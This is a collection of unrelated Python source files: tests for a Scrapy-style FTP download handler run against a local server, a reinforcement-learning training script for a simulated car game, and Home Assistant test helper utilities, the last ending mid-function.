        self.directory = self.mktemp()
        os.mkdir(self.directory)
        userdir = os.path.join(self.directory, self.username)
        os.mkdir(userdir)
        fp = FilePath(userdir)
        fp.child('file.txt').setContent("I have the power!")
        fp.child('file with spaces.txt').setContent("Moooooooooo power!")

        # setup server
        realm = FTPRealm(anonymousRoot=self.directory, userHome=self.directory)
        p = portal.Portal(realm)
        users_checker = checkers.InMemoryUsernamePasswordDatabaseDontUse()
        users_checker.addUser(self.username, self.password)
        p.registerChecker(users_checker, credentials.IUsernamePassword)
        self.factory = FTPFactory(portal=p)
        self.port = reactor.listenTCP(0, self.factory, interface="127.0.0.1")
        self.portNum = self.port.getHost().port
        self.download_handler = FTPDownloadHandler(Settings())
        self.addCleanup(self.port.stopListening)

    def _add_test_callbacks(self, deferred, callback=None, errback=None):
        """Close the FTP connection before running the test's callbacks."""
        def _clean(data):
            self.download_handler.client.transport.loseConnection()
            return data

        deferred.addCallback(_clean)
        if callback:
            deferred.addCallback(callback)
        if errback:
            deferred.addErrback(errback)
        return deferred

    def test_ftp_download_success(self):
        """A successful FTP download returns 200 with body and Size header."""
        request = Request(url="ftp://127.0.0.1:%s/file.txt" % self.portNum,
                meta={"ftp_user": self.username, "ftp_password": self.password})
        d = self.download_handler.download_request(request, None)

        def _test(r):
            self.assertEqual(r.status, 200)
            self.assertEqual(r.body, 'I have the power!')
            self.assertEqual(r.headers, {'Local Filename': [''], 'Size': ['17']})
        return self._add_test_callbacks(d, _test)

    def test_ftp_download_path_with_spaces(self):
        """Remote paths containing spaces are handled."""
        request = Request(
            url="ftp://127.0.0.1:%s/file with spaces.txt" % self.portNum,
            meta={"ftp_user": self.username, "ftp_password": self.password}
        )
        d = self.download_handler.download_request(request, None)

        def _test(r):
            self.assertEqual(r.status, 200)
            self.assertEqual(r.body, 'Moooooooooo power!')
            self.assertEqual(r.headers, {'Local Filename': [''], 'Size': ['18']})
        return self._add_test_callbacks(d, _test)

    def test_ftp_download_notexist(self):
        """A missing remote file maps to a 404 response."""
        request = Request(url="ftp://127.0.0.1:%s/notexist.txt" % self.portNum,
                meta={"ftp_user": self.username, "ftp_password": self.password})
        d = self.download_handler.download_request(request, None)

        def _test(r):
            self.assertEqual(r.status, 404)
        return self._add_test_callbacks(d, _test)

    def test_ftp_local_filename(self):
        """ftp_local_filename meta saves the body to disk; body is the path."""
        local_fname = "/tmp/file.txt"
        request = Request(url="ftp://127.0.0.1:%s/file.txt" % self.portNum,
                meta={"ftp_user": self.username, "ftp_password": self.password, "ftp_local_filename": local_fname})
        d = self.download_handler.download_request(request, None)

        def _test(r):
            self.assertEqual(r.body, local_fname)
            self.assertEqual(r.headers, {'Local Filename': ['/tmp/file.txt'], 'Size': ['17']})
            self.assertTrue(os.path.exists(local_fname))
            with open(local_fname) as f:
                self.assertEqual(f.read(), "I have the power!")
            os.remove(local_fname)
        return self._add_test_callbacks(d, _test)

    def test_invalid_credentials(self):
        """A bad password fails the download with ConnectionLost."""
        request = Request(url="ftp://127.0.0.1:%s/file.txt" % self.portNum,
                meta={"ftp_user": self.username, "ftp_password": 'invalid'})
        d = self.download_handler.download_request(request, None)

        def _test(r):
            self.assertEqual(r.type, ConnectionLost)
        return self._add_test_callbacks(d, errback=_test)
|
|
import carmunk
import numpy as np
import random
import csv
from nn import neural_net, LossHistory
import os.path
import timeit
# Size of the state vector fed to the network (presumably the three sonar
# readings produced by carmunk — TODO confirm against carmunk.GameState).
NUM_INPUT = 3
GAMMA = 0.9  # Forgetting.
TUNING = False  # If False, just use arbitrary, pre-selected params.
def train_net(model, params):
    """Train `model` on the carmunk game with epsilon-greedy Q-learning.

    params: dict with 'batchSize', 'buffer' and 'nn' (layer sizes); also used
    to derive the filenames for saved weights and logged results.
    """
    filename = params_to_filename(params)

    observe = 1000  # Number of frames to observe before training.
    epsilon = 1
    train_frames = 40000  # Number of frames to play.
    batchSize = params['batchSize']
    buffer = params['buffer']

    # Just stuff used below.
    max_car_distance = 0
    car_distance = 0
    t = 0
    data_collect = []
    replay = []  # stores tuples of (S, A, R, S').
    loss_log = []

    # Create a new game instance.
    game_state = carmunk.GameState()

    # Get initial state by doing nothing and getting the state.
    _, state = game_state.frame_step((2))

    # Let's time it.
    start_time = timeit.default_timer()

    # Run the frames.
    while t < train_frames:
        t += 1
        car_distance += 1

        # Choose an action (random while observing or with prob. epsilon).
        if random.random() < epsilon or t < observe:
            action = np.random.randint(0, 3)  # random
        else:
            # Get Q values for each action and pick the best.
            qval = model.predict(state, batch_size=1)
            action = (np.argmax(qval))  # best

        # Take action, observe new state and get our treat.
        reward, new_state = game_state.frame_step(action)

        # Experience replay storage.
        replay.append((state, action, reward, new_state))

        # If we're done observing, start training.
        if t > observe:
            # If we've stored enough in our buffer, pop the oldest.
            if len(replay) > buffer:
                replay.pop(0)

            # Randomly sample our experience replay memory
            minibatch = random.sample(replay, batchSize)

            # Get training values.
            X_train, y_train = process_minibatch(minibatch, model)

            # Train the model on this batch.
            history = LossHistory()
            model.fit(
                X_train, y_train, batch_size=batchSize,
                nb_epoch=1, verbose=0, callbacks=[history]
            )
            loss_log.append(history.losses)

        # Update the starting state with S'.
        state = new_state

        # Decrement epsilon over time.
        # Fix: use a float literal — under Python 2, 1/train_frames is
        # integer division and evaluates to 0, so epsilon never decayed.
        if epsilon > 0.1 and t > observe:
            epsilon -= (1.0 / train_frames)

        # We died, so update stuff.
        if reward == -500:
            # Log the car's distance at this T.
            data_collect.append([t, car_distance])

            # Update max.
            if car_distance > max_car_distance:
                max_car_distance = car_distance

            # Time it.
            tot_time = timeit.default_timer() - start_time
            fps = car_distance / tot_time

            # Output some stuff so we can watch.
            print("Max: %d at %d\tepsilon %f\t(%d)\t%f fps" %
                  (max_car_distance, t, epsilon, car_distance, fps))

            # Reset.
            car_distance = 0
            start_time = timeit.default_timer()

        # Save the model every 1,000 frames (the old comment said 25,000,
        # which did not match the code).
        if t % 1000 == 0:
            model.save_weights('saved-models/' + filename + '-' +
                               str(t) + '.h5',
                               overwrite=True)
            print("Saving model %s - %d" % (filename, t))

    # Log results after we're done all frames.
    log_results(filename, data_collect, loss_log)
def log_results(filename, data_collect, loss_log):
    """Dump per-death distances and per-batch losses to CSV for graphing."""
    learn_path = 'results/sonar-frames/learn_data-' + filename + '.csv'
    loss_path = 'results/sonar-frames/loss_data-' + filename + '.csv'

    with open(learn_path, 'w') as data_dump:
        csv.writer(data_dump).writerows(data_collect)

    with open(loss_path, 'w') as lf:
        loss_writer = csv.writer(lf)
        for loss_item in loss_log:
            loss_writer.writerow(loss_item)
def process_minibatch(minibatch, model):
    """Build (X, y) training arrays from a batch of replay memories.

    Each memory is (old_state, action, reward, new_state). The target row
    starts from the model's current predictions; only the taken action's
    entry is replaced with the Q-learning update.
    """
    X_train, y_train = [], []

    for old_state_m, action_m, reward_m, new_state_m in minibatch:
        # Current Q-value estimates for the old and the new state.
        old_qval = model.predict(old_state_m, batch_size=1)
        new_qval = model.predict(new_state_m, batch_size=1)
        max_future_q = np.max(new_qval)

        # Copy current predictions as the training target.
        target = np.zeros((1, 3))
        target[:] = old_qval[:]

        # A reward of -500 marks a terminal (crash) state: no future reward.
        if reward_m == -500:
            target[0][action_m] = reward_m
        else:
            target[0][action_m] = reward_m + (GAMMA * max_future_q)

        X_train.append(old_state_m.reshape(NUM_INPUT,))
        y_train.append(target.reshape(3,))

    return np.array(X_train), np.array(y_train)
def params_to_filename(params):
    """Encode the hyper-parameter dict as a 'n1-n2-batch-buffer' file stem."""
    parts = (params['nn'][0], params['nn'][1],
             params['batchSize'], params['buffer'])
    return '-'.join(str(p) for p in parts)
def launch_learn(params):
    """Train one hyper-parameter combination unless it was already tested."""
    filename = params_to_filename(params)
    print("Trying %s" % filename)

    marker = 'results/sonar-frames/loss_data-' + filename + '.csv'
    # Make sure we haven't run this one.
    if os.path.isfile(marker):
        print("Already tested.")
        return

    # Create file so we don't double test when we run multiple
    # instances of the script at the same time.
    open(marker, 'a').close()
    print("Starting test.")
    # Train.
    model = neural_net(NUM_INPUT, params['nn'])
    train_net(model, params)
if __name__ == "__main__":
    if TUNING:
        # Grid-search over network sizes, batch sizes and replay buffer
        # sizes; each combination is trained (or skipped) by launch_learn.
        param_list = []
        nn_params = [[164, 150], [256, 256],
                     [512, 512], [1000, 1000]]
        batchSizes = [40, 100, 400]
        buffers = [10000, 50000]

        for nn_param in nn_params:
            for batchSize in batchSizes:
                for buffer in buffers:
                    params = {
                        "batchSize": batchSize,
                        "buffer": buffer,
                        "nn": nn_param
                    }
                    param_list.append(params)

        for param_set in param_list:
            launch_learn(param_set)
    else:
        # Single run with pre-selected hyper-parameters.
        nn_param = [164, 150]
        params = {
            "batchSize": 100,
            "buffer": 50000,
            "nn": nn_param
        }
        model = neural_net(NUM_INPUT, nn_param)
        train_net(model, params)
|
|
"""Test the helper method for writing tests."""
import asyncio
import functools as ft
import json
import logging
import os
import uuid
import sys
import threading
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
from io import StringIO
from unittest.mock import MagicMock, Mock, patch
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
models as auth_models, auth_store, providers as auth_providers,
permissions as auth_permissions)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import mqtt, recorder
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED, ATTR_SERVICE, DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE, EVENT_PLATFORM_DISCOVERED, EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED, SERVER_PORT, STATE_ON, STATE_OFF)
from homeassistant.helpers import (
area_registry, device_registry, entity, entity_platform, entity_registry,
intent, restore_state, storage)
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.unit_system import METRIC_SYSTEM
from homeassistant.util.async_ import (
run_callback_threadsafe, run_coroutine_threadsafe)
# Next port handed out by get_test_instance_port(); starts at HA's default.
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
# HomeAssistant instances created by async_test_home_assistant(); entries are
# removed again when the instance fires EVENT_HOMEASSISTANT_CLOSE.
INSTANCES = []
# OAuth client fixtures (presumably consumed by auth-related tests).
CLIENT_ID = 'https://example.com/app'
CLIENT_REDIRECT_URI = 'https://example.com/app/callback'
def threadsafe_callback_factory(func):
    """Wrap a callback so it can be invoked safely from any thread.

    The wrapped callback must take `hass` as its first positional argument;
    its event loop is used to schedule the actual call.
    """
    @ft.wraps(func)
    def wrapper(*args, **kwargs):
        """Schedule func on the hass loop and block for the result."""
        hass = args[0]
        call = ft.partial(func, *args, **kwargs)
        future = run_callback_threadsafe(hass.loop, call)
        return future.result()

    return wrapper
def threadsafe_coroutine_factory(func):
    """Wrap a coroutine function so it can be invoked from any thread.

    The wrapped coroutine must take `hass` as its first positional argument;
    its event loop is used to run the coroutine.
    """
    @ft.wraps(func)
    def wrapper(*args, **kwargs):
        """Run the coroutine on the hass loop and block for the result."""
        hass = args[0]
        coro = func(*args, **kwargs)
        return run_coroutine_threadsafe(coro, hass.loop).result()

    return wrapper
def get_test_config_dir(*add_path):
    """Return a path to a test config dir, optionally extended by add_path."""
    base = os.path.dirname(__file__)
    return os.path.join(base, 'testing_config', *add_path)
def get_test_home_assistant():
    """Return a Home Assistant object pointing at test config directory."""
    if sys.platform == "win32":
        # Windows needs the proactor event loop.
        loop = asyncio.ProactorEventLoop()
    else:
        loop = asyncio.new_event_loop()

    hass = loop.run_until_complete(async_test_home_assistant(loop))

    # Set once the loop thread exits run_forever, so stop_hass can wait on it.
    stop_event = threading.Event()

    def run_loop():
        """Run event loop."""
        # pylint: disable=protected-access
        loop._thread_ident = threading.get_ident()
        loop.run_forever()
        stop_event.set()

    orig_stop = hass.stop

    def start_hass(*mocks):
        """Start hass."""
        run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()

    def stop_hass():
        """Stop hass."""
        orig_stop()
        stop_event.wait()
        loop.close()

    # Replace start/stop with threadsafe wrappers, since the loop runs in a
    # dedicated thread started below.
    hass.start = start_hass
    hass.stop = stop_hass

    threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()

    return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
    """Return a Home Assistant object pointing at test config dir."""
    hass = ha.HomeAssistant(loop)
    hass.config.async_load = Mock()
    store = auth_store.AuthStore(hass)
    hass.auth = auth.AuthManager(hass, store, {}, {})
    ensure_auth_manager_loaded(hass.auth)
    INSTANCES.append(hass)

    orig_async_add_job = hass.async_add_job
    orig_async_add_executor_job = hass.async_add_executor_job
    orig_async_create_task = hass.async_create_task

    # Wrap the job/task APIs so plain Mocks can be scheduled like coroutines.
    def async_add_job(target, *args):
        """Add job."""
        if isinstance(target, Mock):
            return mock_coro(target(*args))
        return orig_async_add_job(target, *args)

    def async_add_executor_job(target, *args):
        """Add executor job."""
        if isinstance(target, Mock):
            return mock_coro(target(*args))
        return orig_async_add_executor_job(target, *args)

    def async_create_task(coroutine):
        """Create task."""
        if isinstance(coroutine, Mock):
            return mock_coro()
        return orig_async_create_task(coroutine)

    hass.async_add_job = async_add_job
    hass.async_add_executor_job = async_add_executor_job
    hass.async_create_task = async_create_task

    # Fixed test configuration values.
    hass.config.location_name = 'test home'
    hass.config.config_dir = get_test_config_dir()
    hass.config.latitude = 32.87336
    hass.config.longitude = -117.22743
    hass.config.elevation = 0
    hass.config.time_zone = date_util.get_time_zone('US/Pacific')
    hass.config.units = METRIC_SYSTEM
    hass.config.skip_pip = True

    hass.config_entries = config_entries.ConfigEntries(hass, {})
    hass.config_entries._entries = []
    hass.config_entries._store._async_ensure_stop_listener = lambda: None
    hass.state = ha.CoreState.running

    # Mock async_start
    orig_start = hass.async_start

    async def mock_async_start():
        """Start the mocking."""
        # We only mock time during tests and we want to track tasks
        with patch('homeassistant.core._async_create_timer'), \
                patch.object(hass, 'async_stop_track_tasks'):
            await orig_start()

    hass.async_start = mock_async_start

    @ha.callback
    def clear_instance(event):
        """Clear global instance."""
        INSTANCES.remove(hass)

    hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)

    return hass
def get_test_instance_port():
    """Return unused port for running test instance.

    The socket that holds the default port does not get released when we stop
    HA in a different test case. Until I have figured out what is going on,
    let's run each test on a different port.
    """
    global _TEST_INSTANCE_PORT
    # Monotonically increasing counter: ports are never reused in one run.
    _TEST_INSTANCE_PORT += 1
    return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
    """Register a fake service and return the list of recorded calls."""
    recorded_calls = []

    @ha.callback
    def _record_call(call):  # pylint: disable=unnecessary-lambda
        """Append the incoming service call to the log."""
        recorded_calls.append(call)

    hass.services.async_register(
        domain, service, _record_call, schema=schema)

    return recorded_calls


mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
    """Set up a fake intent handler.

    Returns the list that collects every handled Intent object.
    """
    intents = []

    class MockIntentHandler(intent.IntentHandler):
        # Only answer for the requested intent type.
        intent_type = intent_typ

        @asyncio.coroutine
        def async_handle(self, intent):
            """Handle the intent."""
            # NOTE: the parameter shadows the `intent` module here;
            # `intent.create_response()` is called on the Intent object.
            intents.append(intent)
            return intent.create_response()

    intent.async_register(hass, MockIntentHandler())

    return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
    """Fire the MQTT message."""
    # Real MQTT payloads arrive as bytes; mirror that for str input.
    if isinstance(payload, str):
        payload = payload.encode('utf-8')
    msg = mqtt.Message(topic, payload, qos, retain)
    # Inject directly into the MQTT component's handler, bypassing paho.
    hass.data['mqtt']._mqtt_handle_message(msg)


fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
    """Fire a time changed event carrying *time* (normalized to UTC)."""
    hass.bus.async_fire(EVENT_TIME_CHANGED, {'now': date_util.as_utc(time)})


fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
    """Fire a platform-discovered event on the bus (sync version)."""
    event_payload = {
        ATTR_SERVICE: service,
        ATTR_DISCOVERED: info
    }
    hass.bus.fire(EVENT_PLATFORM_DISCOVERED, event_payload)
@ha.callback
def async_fire_service_discovered(hass, service, info):
    """Fire a platform-discovered event on the bus (async version)."""
    event_payload = {
        ATTR_SERVICE: service,
        ATTR_DISCOVERED: info
    }
    hass.bus.async_fire(EVENT_PLATFORM_DISCOVERED, event_payload)
def load_fixture(filename):
    """Return the contents of *filename* from the fixtures directory."""
    fixture_path = os.path.join(
        os.path.dirname(__file__), 'fixtures', filename)
    with open(fixture_path, encoding='utf-8') as fixture_file:
        return fixture_file.read()
def mock_state_change_event(hass, new_state, old_state=None):
    """Fire a mock state changed event on the bus."""
    payload = {
        'entity_id': new_state.entity_id,
        'new_state': new_state,
    }

    # old_state is only attached when truthy, matching real events.
    if old_state:
        payload['old_state'] = old_state

    hass.bus.fire(EVENT_STATE_CHANGED, payload, context=new_state.context)
async def async_mock_mqtt_component(hass, config=None):
    """Mock the MQTT component.

    Sets up the real MQTT integration against a fake paho client and
    returns the component wrapped in a MagicMock for call inspection.
    """
    if config is None:
        config = {mqtt.CONF_BROKER: 'mock-broker'}

    with patch('paho.mqtt.client.Client') as mock_client:
        # paho return codes: 0 / (0, mid) mean success.
        mock_client().connect.return_value = 0
        mock_client().subscribe.return_value = (0, 0)
        mock_client().unsubscribe.return_value = (0, 0)
        mock_client().publish.return_value = (0, 0)

        result = await async_setup_component(hass, mqtt.DOMAIN, {
            mqtt.DOMAIN: config
        })
        assert result
        await hass.async_block_till_done()

        # Wrap the live component so tests can assert on its calls while
        # still delegating to the real implementation.
        hass.data['mqtt'] = MagicMock(spec_set=hass.data['mqtt'],
                                      wraps=hass.data['mqtt'])

        return hass.data['mqtt']


mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
    """Mark *component* as set up without running its setup.

    Raises AssertionError if the component was already set up.
    """
    if component in hass.config.components:
        # The original built this AssertionError without raising it,
        # so duplicate setup went unnoticed. Raise to fail loudly.
        raise AssertionError(
            "Component {} is already setup".format(component))

    hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
    """Mock the Entity Registry."""
    reg = entity_registry.EntityRegistry(hass)
    reg.entities = mock_entries if mock_entries else OrderedDict()
    hass.data[entity_registry.DATA_REGISTRY] = reg
    return reg
def mock_area_registry(hass, mock_entries=None):
    """Mock the Area Registry."""
    reg = area_registry.AreaRegistry(hass)
    reg.areas = mock_entries if mock_entries else OrderedDict()
    hass.data[area_registry.DATA_REGISTRY] = reg
    return reg
def mock_device_registry(hass, mock_entries=None):
    """Mock the Device Registry."""
    reg = device_registry.DeviceRegistry(hass)
    reg.devices = mock_entries if mock_entries else OrderedDict()
    hass.data[device_registry.DATA_REGISTRY] = reg
    return reg
class MockGroup(auth_models.Group):
    """Mock a group in Home Assistant."""

    def __init__(self, id=None, name='Mock Group',
                 policy=system_policies.ADMIN_POLICY):
        """Create the mock group, defaulting to the admin policy."""
        group_kwargs = {'name': name, 'policy': policy}
        if id is not None:
            group_kwargs['id'] = id
        super().__init__(**group_kwargs)

    def add_to_hass(self, hass):
        """Add this group to a hass instance's auth manager."""
        return self.add_to_auth_manager(hass.auth)

    def add_to_auth_manager(self, auth_mgr):
        """Insert this group directly into an auth manager's store."""
        ensure_auth_manager_loaded(auth_mgr)
        auth_mgr._store._groups[self.id] = self
        return self
class MockUser(auth_models.User):
    """Mock a user in Home Assistant."""

    def __init__(self, id=None, is_owner=False, is_active=True,
                 name='Mock User', system_generated=False, groups=None):
        """Create the mock user with sensible defaults."""
        user_kwargs = {
            'is_owner': is_owner,
            'is_active': is_active,
            'name': name,
            'system_generated': system_generated,
            'groups': groups or [],
            'perm_lookup': None,
        }
        if id is not None:
            user_kwargs['id'] = id
        super().__init__(**user_kwargs)

    def add_to_hass(self, hass):
        """Add this user to a hass instance's auth manager."""
        return self.add_to_auth_manager(hass.auth)

    def add_to_auth_manager(self, auth_mgr):
        """Insert this user directly into an auth manager's store."""
        ensure_auth_manager_loaded(auth_mgr)
        auth_mgr._store._users[self.id] = self
        return self

    def mock_policy(self, policy):
        """Replace this user's permissions with *policy*."""
        self._permissions = auth_permissions.PolicyPermissions(
            policy, self.perm_lookup)
async def register_auth_provider(hass, config):
    """Register an auth provider.

    Builds the provider from *config* and inserts it into the auth
    manager; raises ValueError if one with the same key exists.
    """
    provider = await auth_providers.auth_provider_from_config(
        hass, hass.auth._store, config)
    assert provider is not None, 'Invalid config specified'
    # Providers are keyed by (type, id) in the auth manager.
    key = (provider.type, provider.id)
    providers = hass.auth._providers

    if key in providers:
        raise ValueError('Provider already registered')

    providers[key] = provider
    return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
    """Ensure an auth manager is considered loaded."""
    store = auth_mgr._store
    # A store whose _users is still None has never been loaded; seed it
    # with defaults so tests can insert users/groups directly.
    if store._users is None:
        store._set_defaults()
class MockModule:
    """Representation of a fake module."""

    # pylint: disable=invalid-name
    def __init__(self, domain=None, dependencies=None, setup=None,
                 requirements=None, config_schema=None, platform_schema=None,
                 platform_schema_base=None, async_setup=None,
                 async_setup_entry=None, async_unload_entry=None,
                 async_migrate_entry=None, async_remove_entry=None,
                 partial_manifest=None):
        """Initialize the mock module.

        Only the hooks that are supplied get attached as attributes, so
        hasattr() checks behave like they would on a real component.
        """
        self.__name__ = 'homeassistant.components.{}'.format(domain)
        self.__file__ = 'homeassistant/components/{}'.format(domain)
        self.DOMAIN = domain
        self.DEPENDENCIES = dependencies or []
        self.REQUIREMENTS = requirements or []
        # Overlay to be used when generating manifest from this module
        self._partial_manifest = partial_manifest

        if config_schema is not None:
            self.CONFIG_SCHEMA = config_schema

        if platform_schema is not None:
            self.PLATFORM_SCHEMA = platform_schema

        if platform_schema_base is not None:
            self.PLATFORM_SCHEMA_BASE = platform_schema_base

        if setup is not None:
            # We run this in executor, wrap it in function
            self.setup = lambda *args: setup(*args)

        if async_setup is not None:
            self.async_setup = async_setup

        if setup is None and async_setup is None:
            # Default: a setup coroutine that always reports success.
            self.async_setup = mock_coro_func(True)

        if async_setup_entry is not None:
            self.async_setup_entry = async_setup_entry

        if async_unload_entry is not None:
            self.async_unload_entry = async_unload_entry

        if async_migrate_entry is not None:
            self.async_migrate_entry = async_migrate_entry

        if async_remove_entry is not None:
            self.async_remove_entry = async_remove_entry

    def mock_manifest(self):
        """Generate a mock manifest to represent this module."""
        return {
            **loader.manifest_from_legacy_module(self.DOMAIN, self),
            **(self._partial_manifest or {})
        }
class MockPlatform:
    """Provide a fake platform."""

    __name__ = 'homeassistant.components.light.bla'
    __file__ = 'homeassistant/components/blah/light'

    # pylint: disable=invalid-name
    def __init__(self, setup_platform=None, dependencies=None,
                 platform_schema=None, async_setup_platform=None,
                 async_setup_entry=None, scan_interval=None):
        """Initialize the platform.

        Like MockModule, only supplied hooks are attached as attributes.
        """
        self.DEPENDENCIES = dependencies or []

        if platform_schema is not None:
            self.PLATFORM_SCHEMA = platform_schema

        if scan_interval is not None:
            self.SCAN_INTERVAL = scan_interval

        if setup_platform is not None:
            # We run this in executor, wrap it in function
            self.setup_platform = lambda *args: setup_platform(*args)

        if async_setup_platform is not None:
            self.async_setup_platform = async_setup_platform

        if async_setup_entry is not None:
            self.async_setup_entry = async_setup_entry

        if setup_platform is None and async_setup_platform is None:
            # Default: a platform setup coroutine that does nothing.
            self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
    """Mock class with some mock defaults."""

    def __init__(
        self, hass,
        logger=None,
        domain='test_domain',
        platform_name='test_platform',
        platform=None,
        scan_interval=timedelta(seconds=15),
        entity_namespace=None,
        async_entities_added_callback=lambda: None
    ):
        """Initialize a mock entity platform.

        All arguments are passed straight to EntityPlatform; this class
        only supplies test-friendly defaults.
        """
        if logger is None:
            logger = logging.getLogger('homeassistant.helpers.entity_platform')

        # Otherwise the constructor will blow up.
        if (isinstance(platform, Mock) and
                isinstance(platform.PARALLEL_UPDATES, Mock)):
            platform.PARALLEL_UPDATES = 0

        super().__init__(
            hass=hass,
            logger=logger,
            domain=domain,
            platform_name=platform_name,
            platform=platform,
            scan_interval=scan_interval,
            entity_namespace=entity_namespace,
            async_entities_added_callback=async_entities_added_callback,
        )
class MockToggleDevice(entity.ToggleEntity):
    """Provide a mock toggle device that records every access."""

    def __init__(self, name, state):
        """Initialize the mock device."""
        self._name = name or DEVICE_DEFAULT_NAME
        self._state = state
        self.calls = []

    def _record(self, method, params):
        """Append an access record to the call log."""
        self.calls.append((method, params))

    @property
    def name(self):
        """Return the name of the device if any."""
        self._record('name', {})
        return self._name

    @property
    def state(self):
        """Return the state of the device if any."""
        self._record('state', {})
        return self._state

    @property
    def is_on(self):
        """Return true if device is on."""
        self._record('is_on', {})
        return self._state == STATE_ON

    def turn_on(self, **kwargs):
        """Turn the device on."""
        self._record('turn_on', kwargs)
        self._state = STATE_ON

    def turn_off(self, **kwargs):
        """Turn the device off."""
        self._record('turn_off', kwargs)
        self._state = STATE_OFF

    def last_call(self, method=None):
        """Return the most recent call, optionally filtered by method."""
        if not self.calls:
            return None
        if method is None:
            return self.calls[-1]
        matching = [call for call in self.calls if call[0] == method]
        return matching[-1] if matching else None
class MockConfigEntry(config_entries.ConfigEntry):
    """Helper for creating config entries that adds some defaults."""

    def __init__(self, *, domain='test', data=None, version=1, entry_id=None,
                 source=config_entries.SOURCE_USER, title='Mock Title',
                 state=None, options=None,
                 connection_class=config_entries.CONN_CLASS_UNKNOWN):
        """Initialize a mock config entry.

        The original signature used the mutable default ``options={}``,
        which shared one dict across every entry created with the
        default; use None and build a fresh dict per instance instead.
        """
        kwargs = {
            'entry_id': entry_id or uuid.uuid4().hex,
            'domain': domain,
            'data': data or {},
            'options': options or {},
            'version': version,
            'title': title,
            'connection_class': connection_class,
        }
        if source is not None:
            kwargs['source'] = source
        if state is not None:
            kwargs['state'] = state
        super().__init__(**kwargs)

    def add_to_hass(self, hass):
        """Test helper to add entry to hass."""
        hass.config_entries._entries.append(self)

    def add_to_manager(self, manager):
        """Test helper to add entry to entry manager."""
        manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
    """Patch load_yaml with a dictionary of yaml files.

    files_dict maps file names to YAML content strings. With endswith
    True, partial (suffix) matches are also resolved.
    """
    # match using endswith, start search with longest string
    # NOTE(review): sorted(key=len) is ascending, so matchlist is
    # actually shortest-first despite the comment above — confirm
    # the intended ordering.
    matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []

    def mock_open_f(fname, **_):
        """Mock open() in the yaml module, used by load_yaml."""
        # Return the mocked file on full match
        if fname in files_dict:
            _LOGGER.debug("patch_yaml_files match %s", fname)
            res = StringIO(files_dict[fname])
            # load_yaml reads .name from the file object for messages.
            setattr(res, 'name', fname)
            return res

        # Match using endswith
        for ends in matchlist:
            if fname.endswith(ends):
                _LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
                res = StringIO(files_dict[ends])
                setattr(res, 'name', fname)
                return res

        # Fallback for hass.components (i.e. services.yaml)
        if 'homeassistant/components' in fname:
            _LOGGER.debug("patch_yaml_files using real file: %s", fname)
            return open(fname, encoding='utf-8')

        # Not found
        raise FileNotFoundError("File not found: {}".format(fname))

    return patch.object(yaml, 'open', mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
    """Return a coroutine object that yields *return_value* or raises."""
    coro_factory = mock_coro_func(return_value, exception)
    return coro_factory()
def mock_coro_func(return_value=None, exception=None):
    """Return a coroutine function that returns a value or raises.

    Converted from the deprecated generator-based ``@asyncio.coroutine``
    (removed in Python 3.11) to a native ``async def``; the file already
    uses ``async def`` throughout, so behavior is unchanged.
    """
    async def coro(*args, **kwargs):
        """Fake coroutine that ignores its arguments."""
        if exception:
            raise exception
        return return_value

    return coro
@contextmanager
def assert_setup_component(count, domain=None):
    """Collect valid configuration from setup_component.

    - count: The amount of valid platforms that should be setup
    - domain: The domain to count is optional. It can be automatically
      determined most of the time

    Use as a context manager around setup.setup_component
        with assert_setup_component(0) as result_config:
            setup_component(hass, domain, start_config)
            # using result_config is optional
    """
    config = {}

    async def mock_psc(hass, config_input, integration):
        """Mock the prepare_setup_component to capture config."""
        domain_input = integration.domain
        res = await async_process_component_config(
            hass, config_input, integration)
        # res is None when validation failed; record what survived.
        config[domain_input] = None if res is None else res.get(domain_input)
        _LOGGER.debug("Configuration for %s, Validated: %s, Original %s",
                      domain_input,
                      config[domain_input],
                      config_input.get(domain_input))
        return res

    assert isinstance(config, dict)
    with patch('homeassistant.config.async_process_component_config',
               mock_psc):
        yield config

    # After the block: infer the domain if exactly one was captured.
    if domain is None:
        assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
                                  .format(list(config.keys())))
        domain = list(config.keys())[0]

    res = config.get(domain)
    res_len = 0 if res is None else len(res)
    assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
        .format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
    """Initialize the recorder.

    Uses an in-memory SQLite database and skips schema migration.
    """
    config = dict(add_config) if add_config else {}
    config[recorder.CONF_DB_URL] = 'sqlite://'  # In memory DB

    with patch('homeassistant.components.recorder.migration.migrate_schema'):
        assert setup_component(hass, recorder.DOMAIN,
                               {recorder.DOMAIN: config})
        assert recorder.DOMAIN in hass.config.components
    _LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
    """Mock the DATA_RESTORE_CACHE.

    Pre-populates the restore-state machinery with *states* so entities
    restore them on startup.
    """
